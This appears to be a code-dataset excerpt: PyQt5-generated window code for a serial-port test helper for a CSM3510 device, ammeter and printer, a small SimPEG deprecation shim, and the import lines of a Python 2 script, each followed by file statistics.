palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.currenter_head_text.setPalette(palette)
font = QtGui.QFont()
font.setFamily("Microsoft YaHei UI")
font.setPointSize(16)
self.currenter_head_text.setFont(font)
self.currenter_head_text.setLayoutDirection(QtCore.Qt.LeftToRight)
self.currenter_head_text.setAlignment(QtCore.Qt.AlignCenter)
self.currenter_head_text.setReadOnly(True)
self.currenter_head_text.setObjectName("currenter_head_text")
self.verticalLayout_5.addWidget(self.currenter_head_text)
self.verticalLayout_11 = QtWidgets.QVBoxLayout()
self.verticalLayout_11.setContentsMargins(-1, -1, -1, 15)
self.verticalLayout_11.setObjectName("verticalLayout_11")
self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.verticalLayout_12 = QtWidgets.QVBoxLayout()
self.verticalLayout_12.setObjectName("verticalLayout_12")
self.lineEdit_21 = QtWidgets.QLineEdit(self.tab_setting)
self.lineEdit_21.setEnabled(False)
self.lineEdit_21.setLayoutDirection(QtCore.Qt.LeftToRight)
self.lineEdit_21.setAlignment(QtCore.Qt.AlignCenter)
self.lineEdit_21.setReadOnly(True)
self.lineEdit_21.setObjectName("lineEdit_21")
self.verticalLayout_12.addWidget(self.lineEdit_21)
self.lineEdit_22 = QtWidgets.QLineEdit(self.tab_setting)
self.lineEdit_22.setEnabled(False)
self.lineEdit_22.setAlignment(QtCore.Qt.AlignCenter)
self.lineEdit_22.setReadOnly(True)
self.lineEdit_22.setObjectName("lineEdit_22")
self.verticalLayout_12.addWidget(self.lineEdit_22)
self.lineEdit_27 = QtWidgets.QLineEdit(self.tab_setting)
self.lineEdit_27.setEnabled(False)
self.lineEdit_27.setAlignment(QtCore.Qt.AlignCenter)
self.lineEdit_27.setReadOnly(True)
self.lineEdit_27.setObjectName("lineEdit_27")
self.verticalLayout_12.addWidget(self.lineEdit_27)
self.btn_currenter_setting = QtWidgets.QPushButton(self.tab_setting)
self.btn_currenter_setting.setObjectName("btn_currenter_setting")
self.verticalLayout_12.addWidget(self.btn_currenter_setting)
self.horizontalLayout_6.addLayout(self.verticalLayout_12)
self.verticalLayout_13 = QtWidgets.QVBoxLayout()
self.verticalLayout_13.setObjectName("verticalLayout_13")
self.currenter_comboBox_port = QtWidgets.QComboBox(self.tab_setting)
self.currenter_comboBox_port.setEditable(True)
self.currenter_comboBox_port.setObjectName("currenter_comboBox_port")
self.verticalLayout_13.addWidget(self.currenter_comboBox_port)
self.currenter_comboBox_baudrate = QtWidgets.QComboBox(self.tab_setting)
self.currenter_comboBox_baudrate.setObjectName("currenter_comboBox_baudrate")
self.verticalLayout_13.addWidget(self.currenter_comboBox_baudrate)
self.currenter_comboBox_databits = QtWidgets.QComboBox(self.tab_setting)
self.currenter_comboBox_databits.setObjectName("currenter_comboBox_databits")
self.verticalLayout_13.addWidget(self.currenter_comboBox_databits)
self.btn_currenter_autodetect = QtWidgets.QPushButton(self.tab_setting)
self.btn_currenter_autodetect.setObjectName("btn_currenter_autodetect")
self.verticalLayout_13.addWidget(self.btn_currenter_autodetect)
self.horizontalLayout_6.addLayout(self.verticalLayout_13)
self.horizontalLayout_6.setStretch(0, 1)
self.horizontalLayout_6.setStretch(1, 1)
self.verticalLayout_11.addLayout(self.horizontalLayout_6)
self.verticalLayout_5.addLayout(self.verticalLayout_11)
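# Printer block: only a read-only printer-name field and a settings button.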
self.printer_head_text = QtWidgets.QLineEdit(self.tab_setting)
self.printer_head_text.setEnabled(False)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.printer_head_text.setPalette(palette)
font = QtGui.QFont()
font.setFamily("Microsoft YaHei")
font.setPointSize(16)
self.printer_head_text.setFont(font)
self.printer_head_text.setLayoutDirection(QtCore.Qt.LeftToRight)
self.printer_head_text.setAlignment(QtCore.Qt.AlignCenter)
self.printer_head_text.setReadOnly(True)
self.printer_head_text.setObjectName("printer_head_text")
self.verticalLayout_5.addWidget(self.printer_head_text)
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.verticalLayout_7 = QtWidgets.QVBoxLayout()
self.verticalLayout_7.setObjectName("verticalLayout_7")
self.printer_name = QtWidgets.QLineEdit(self.tab_setting)
self.printer_name.setEnabled(False)
self.printer_name.setCursor(QtGui.QCursor(QtCore.Qt.IBeamCursor))
self.printer_name.setAlignment(QtCore.Qt.AlignCenter)
self.printer_name.setReadOnly(True)
self.printer_name.setObjectName("printer_name")
self.verticalLayout_7.addWidget(self.printer_name)
self.btn_printer_setting = QtWidgets.QPushButton(self.tab_setting)
self.btn_printer_setting.setObjectName("btn_printer_setting")
self.verticalLayout_7.addWidget(self.btn_printer_setting)
self.horizontalLayout_4.addLayout(self.verticalLayout_7)
self.horizontalLayout_4.setStretch(0, 1)
self.verticalLayout_5.addLayout(self.horizontalLayout_4)
self.verticalLayout.addLayout(self.verticalLayout_5)
self.gridLayout_12.addLayout(self.verticalLayout, 0, 0, 1, 1)
self.horizontalLayout_11.addLayout(self.gridLayout_12)
self.horizontalLayout_14 = QtWidgets.QHBoxLayout()
self.horizontalLayout_14.setObjectName("horizontalLayout_14")
self.label_4 = QtWidgets.QLabel(self.tab_setting)
self.label_4.setText("")
self.label_4.setObjectName("label_4")
self.horizontalLayout_14.addWidget(self.label_4)
self.horizontalLayout_11.addLayout(self.horizontalLayout_14)
self.horizontalLayout_11.setStretch(0, 3)
self.horizontalLayout_11.setStretch(1, 94)
self.horizontalLayout_11.setStretch(2, 3)
self.gridLayout_7.addLayout(self.horizontalLayout_11, 0, 0, 1, 1)
self.tabWidget.addTab(self.tab_setting, "")
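# --- Watching tab: live data display, test-result view and logging controls ---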
self.tab_watching = QtWidgets.QWidget()
self.tab_watching.setObjectName("tab_watching")
self.gridLayout_8 = QtWidgets.QGridLayout(self.tab_watching)
self.gridLayout_8.setObjectName("gridLayout_8")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.horizontalLayout_10 = QtWidgets.QHBoxLayout()
self.horizontalLayout_10.setObjectName("horizontalLayout_10")
self.label_2 = QtWidgets.QLabel(self.tab_watching)
self.label_2.setText("")
self.label_2.setObjectName("label_2")
self.horizontalLayout_10.addWidget(self.label_2)
self.horizontalLayout_2.addLayout(self.horizontalLayout_10)
self.verticalLayout_14 = QtWidgets.QVBoxLayout()
self.verticalLayout_14.setObjectName("verticalLayout_14")
self.plainText_display = QtWidgets.QPlainTextEdit(self.tab_watching)
font = QtGui.QFont()
font.setFamily("宋体")
font.setPointSize(12)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.plainText_display.setFont(font)
self.plainText_display.setUndoRedoEnabled(False)
self.plainText_display.setReadOnly(True)
self.plainText_display.setObjectName("plainText_display")
self.verticalLayout_14.addWidget(self.plainText_display)
self.textBrowser_result = QtWidgets.QTextBrowser(self.tab_watching)
self.textBrowser_result.setEnabled(True)
font = QtGui.QFont()
font.setFamily("微软雅黑")
self.textBrowser_result.setFont(font)
self.textBrowser_result.setObjectName("textBrowser_result")
self.verticalLayout_14.addWidget(self.textBrowser_result)
self.btn_reset_result = QtWidgets.QPushButton(self.tab_watching)
self.btn_reset_result.setObjectName("btn_reset_result")
self.verticalLayout_14.addWidget(self.btn_reset_result)
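# Bottom control row: save-log button, per-device logging checkboxes, and the
# export button (object name "btn_export_excle" is spelled that way in the
# source .ui and is kept to match references elsewhere in the code).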
self.gridLayout_9 = QtWidgets.QGridLayout()
self.gridLayout_9.setObjectName("gridLayout_9")
self.horizontalLayout_7 = QtWidgets.QHBoxLayout()
self.horizontalLayout_7.setObjectName("horizontalLayout_7")
self.gridLayout_9.addLayout(self.horizontalLayout_7, 0, 0, 1, 1)
self.btn_export_excle = QtWidgets.QPushButton(self.tab_watching)
self.btn_export_excle.setObjectName("btn_export_excle")
self.gridLayout_9.addWidget(self.btn_export_excle, 1, 5, 1, 1)
self.horizontalLayout_9 = QtWidgets.QHBoxLayout()
self.horizontalLayout_9.setObjectName("horizontalLayout_9")
self.btn_save_log = QtWidgets.QPushButton(self.tab_watching)
self.btn_save_log.setObjectName("btn_save_log")
self.horizontalLayout_9.addWidget(self.btn_save_log)
self.checkBox_csm3510 = QtWidgets.QCheckBox(self.tab_watching)
self.checkBox_csm3510.setCheckable(True)
self.checkBox_csm3510.setChecked(True)
self.checkBox_csm3510.setObjectName("checkBox_csm3510")
self.horizontalLayout_9.addWidget(self.checkBox_csm3510)
self.checkBox_cc2640 = QtWidgets.QCheckBox(self.tab_watching)
self.checkBox_cc2640.setChecked(True)
self.checkBox_cc2640.setObjectName("checkBox_cc2640")
self.horizontalLayout_9.addWidget(self.checkBox_cc2640)
self.checkBox_currenter = QtWidgets.QCheckBox(self.tab_watching)
self.checkBox_currenter.setChecked(True)
self.checkBox_currenter.setObjectName("checkBox_currenter")
self.horizontalLayout_9.addWidget(self.checkBox_currenter)
self.checkBox_printer = QtWidgets.QCheckBox(self.tab_watching)
self.checkBox_printer.setChecked(True)
self.checkBox_printer.setObjectName("checkBox_printer")
self.horizontalLayout_9.addWidget(self.checkBox_printer)
self.gridLayout_9.addLayout(self.horizontalLayout_9, 1, 0, 1, 1)
self.gridLayout_9.setColumnStretch(0, 2)
self.verticalLayout_14.addLayout(self.gridLayout_9)
self.verticalLayout_14.setStretch(0, 12)
self.verticalLayout_14.setStretch(1, 5)
self.horizontalLayout_2.addLayout(self.verticalLayout_14)
self.horizontalLayout_8 = QtWidgets.QHBoxLayout()
self.horizontalLayout_8.setObjectName("horizontalLayout_8")
self.label = QtWidgets.QLabel(self.tab_watching)
self.label.setText("")
self.label.setObjectName("label")
self.horizontalLayout_8.addWidget(self.label)
self.horizontalLayout_2.addLayout(self.horizontalLayout_8)
self.horizontalLayout_2.setStretch(0, 5)
self.horizontalLayout_2.setStretch(1, 90)
self.horizontalLayout_2.setStretch(2, 5)
self.gridLayout_8.addLayout(self.horizontalLayout_2, 0, 0, 1, 1)
self.tabWidget.addTab(self.tab_watching, "")
self.tab_log = QtWidgets.QWidget()
self.tab_log.setObjectName("tab_log")
self.gridLayout_6 = QtWidgets.QGridLayout(self.tab_log)
self.gridLayout_6.setObjectName("gridLayout_6")
self.gridLayout_4 = QtWidgets.QGridLayout()
self.gridLayout_4.setContentsMargins(10, -1, 10, -1)
self.gridLayout_4.setObjectName("gridLayout_4")
self.plainTextEdit_log = QtWidgets.QPlainTextEdit(self.tab_log)
self.plainTextEdit_log.setObjectName("plainTextEdit_log")
self.gridLayout_4.addWidget(self.plainTextEdit_log, 0, 0, 1, 1)
self.gridLayout_6.addLayout(self.gridLayout_4, 0, 0, 1, 1)
self.tabWidget.addTab(self.tab_log, "")
self.tab_help = QtWidgets.QWidget()
self.tab_help.setObjectName("tab_help")
self.gridLayout_5 = QtWidgets.QGridLayout(self.tab_help)
self.gridLayout_5.setObjectName("gridLayout_5")
self.textBrowser_help = QtWidgets.QTextBrowser(self.tab_help)
self.textBrowser_help.setObjectName("textBrowser_help")
self.gridLayout_5.addWidget(self.textBrowser_help, 0, 0, 1, 1)
self.tabWidget.addTab(self.tab_help, "")
self.gridLayout.addWidget(self.tabWidget, 0, 0, 1, 1)
self.horizontalLayout.addLayout(self.gridLayout)
MainWindow.setCentralWidget(self.centralwidget)
self.actionVersion = QtWidgets.QAction(MainWindow)
self.actionVersion.setObjectName("actionVersion")
self.actionAbout = QtWidgets.QAction(MainWindow)
self.actionAbout.setObjectName("actionAbout")
self.actionClose = QtWidgets.QAction(MainWindow)
self.actionClose.setObjectName("actionClose")
self.actionautoDetect = QtWidgets.QAction(MainWindow)
self.actionautoDetect.setCheckable(False)
self.actionautoDetect.setObjectName("actionautoDetect")
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(1)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "CSM3510_Helper"))
self.csm3510_head_text.setText(_translate("MainWindow", "Configure CSM3510 serial port"))
self.lineEdit_16.setText(_translate("MainWindow", "Port"))
self.lineEdit_17.setText(_translate("MainWindow", "Baud rate"))
self.lineEdit_18.setText(_translate("MainWindow", "Data bits"))
self.btn_csm3510_setting.setText(_translate("MainWindow", "Set"))
self.btn_csm3510_autodetect.setText(_translate("MainWindow", "Auto-detect"))
self.cc2640_head_text.setText(_translate("MainWindow", "Configure test-fixture serial port"))
self.lineEdit_6.setText(_translate("MainWindow", "Port"))
self.lineEdit_7.setText(_translate("MainWindow", "Baud rate"))
self.lineEdit_8.setText(_translate("MainWindow", "Data bits"))
self.btn_cc2640_setting.setText(_translate("MainWindow", "Set"))
self.btn_cc2640_autodetect.setText(_translate("MainWindow", "Auto-detect"))
self.currenter_head_text.setText(_translate("MainWindow", "Configure ammeter serial port"))
self.lineEdit_21.setText(_translate("MainWindow", "Port"))
self.lineEdit_22.setText(_translate("MainWindow", "Baud rate"))
self.lineEdit_27.setText(_translate("MainWindow", "Data bits"))
self.btn_currenter_setting.setText(_translate("MainWindow", "Set"))
self.btn_currenter_autodetect.setText(_translate("MainWindow", "Auto-detect"))
self.printer_head_text.setText(_translate("MainWindow", "Configure printer properties"))
self.btn_printer_setting.setText(_translate("MainWindow", "Set properties / print test page"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_setting), _translate("MainWindow", "Settings"))
self.plainText_display.setPlainText(_translate("MainWindow", "Waiting......"))
self.btn_reset_result.setText(_translate("MainWindow", "Retest"))
self.btn_export_excle.setText(_translate("MainWindow", "Export Excel"))
self.btn_save_log.setText(_translate("MainWindow", "Save log"))
self.checkBox_csm3510.setText(_translate("MainWindow", "CSM3510"))
self.checkBox_cc2640.setText(_translate("MainWindow", "Test fixture"))
self.checkBox_currenter.setText(_translate("MainWindow", "Ammeter"))
self.checkBox_printer.setText(_translate("MainWindow", "Printer"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_watching), _translate("MainWindow", "Monitor"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_log), _translate("MainWindow", "Log"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_help), _translate("MainWindow", "Help"))
self.actionVersion.setText(_translate("MainWindow", "Version"))
self.actionAbout.setText(_translate("MainWindow", "About"))
self.actionAbout.setIconText(_translate("MainWindow", "About"))
self.actionClose.setText(_translate("MainWindow", "Close"))
self.actionautoDetect.setText(_translate("MainWindow", "Auto-configure serial ports"))
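A generated class like this is normally left untouched and driven from a small launcher. A minimal sketch follows; the class name Ui_MainWindow is an assumption based on standard pyuic5 output and the "MainWindow" translation context, not something shown in this excerpt.
# Hypothetical launcher for the generated UI class above; Ui_MainWindow
# is assumed to be the pyuic5-generated class providing setupUi().
import sys
from PyQt5 import QtWidgets

if __name__ == "__main__":
    app = QtWidgets.QApplication(sys.argv)
    window = QtWidgets.QMainWindow()
    ui = Ui_MainWindow()   # generated class with setupUi()/retranslateUi()
    ui.setupUi(window)     # builds the tab-widget tree defined above
    window.show()
    sys.exit(app.exec_())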
| 60.502248
| 108
| 0.707947
| 10,928
| 94,202
| 6.03459
| 0.02489
| 0.143511
| 0.087344
| 0.114639
| 0.829694
| 0.805326
| 0.775756
| 0.743108
| 0.71319
| 0.70861
| 0
| 0.046312
| 0.174816
| 94,202
| 1,556
| 109
| 60.541131
| 0.802043
| 0.001932
| 0
| 0.716969
| 1
| 0
| 0.021753
| 0.003021
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001295
| false
| 0
| 0.000648
| 0
| 0.002591
| 0.016839
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| be2e1ac0eb53b715b8e3492d93ac7421a1c61da3
| 164
| py
| Python
| SimPEG/electromagnetics/natural_source/utils/plotDataTypes.py
| prisae/simpeg
| 5cdd1b496bddcf3d9acd714b901a57bad6fb1ef9
| ["MIT"]
| 3
| 2021-08-04T02:27:41.000Z
| 2022-01-12T00:20:07.000Z
| SimPEG/electromagnetics/natural_source/utils/plotDataTypes.py
| thast/simpeg
| 8021082b8b53f3c08fa87fc085547bdd56437c6b
| ["MIT"]
| 2
| 2020-06-16T00:11:37.000Z
| 2020-07-10T19:45:09.000Z
| SimPEG/electromagnetics/natural_source/utils/plotDataTypes.py
| thast/simpeg
| 8021082b8b53f3c08fa87fc085547bdd56437c6b
| ["MIT"]
| 1
| 2021-12-29T00:06:07.000Z
| 2021-12-29T00:06:07.000Z
|
from ....utils.code_utils import deprecate_module
deprecate_module("plotDataTypes", "plot_data_types", "0.16.0", future_warn=True)
from .plot_data_types import *
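This three-line shim re-exports the renamed module while warning downstream importers. For context, a deprecate_module-style helper usually amounts to a single warnings.warn call at import time; the sketch below is an assumption, not SimPEG's actual code_utils implementation.
# Minimal sketch of a module-deprecation helper; argument names and the
# message wording are assumptions, not SimPEG's real implementation.
import warnings

def deprecate_module(old_name, new_name, removal_version, future_warn=False):
    category = FutureWarning if future_warn else DeprecationWarning
    warnings.warn(
        "%s has been renamed to %s and will be removed in version %s."
        % (old_name, new_name, removal_version),
        category,
        stacklevel=2,  # attribute the warning to the importing module
    )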
| 27.333333
| 80
| 0.786585
| 24
| 164
| 5.041667
| 0.625
| 0.247934
| 0.214876
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026667
| 0.085366
| 164
| 5
| 81
| 32.8
| 0.78
| 0
| 0
| 0
| 0
| 0
| 0.207317
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 8
| be95fe69d3da94304f9bbf30e3c65814a11f0c72
| 28,745
| py
| Python
| 2020.py
| farelind/relind_2020
| 7b50f5bffcbc70d7e62e60aa2a15f65a93a00592
| ["Apache-2.0"]
| null | null | null
| 2020.py
| farelind/relind_2020
| 7b50f5bffcbc70d7e62e60aa2a15f65a93a00592
| ["Apache-2.0"]
| null | null | null
| 2020.py
| farelind/relind_2020
| 7b50f5bffcbc70d7e62e60aa2a15f65a93a00592
| ["Apache-2.0"]
| null | null | null
|
#!/usr/bin/python2
# coding=utf-8
#Import module
import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib
from multiprocessing.pool import ThreadPool
from datetime import datetime
try:
import mechanize
except ImportError:
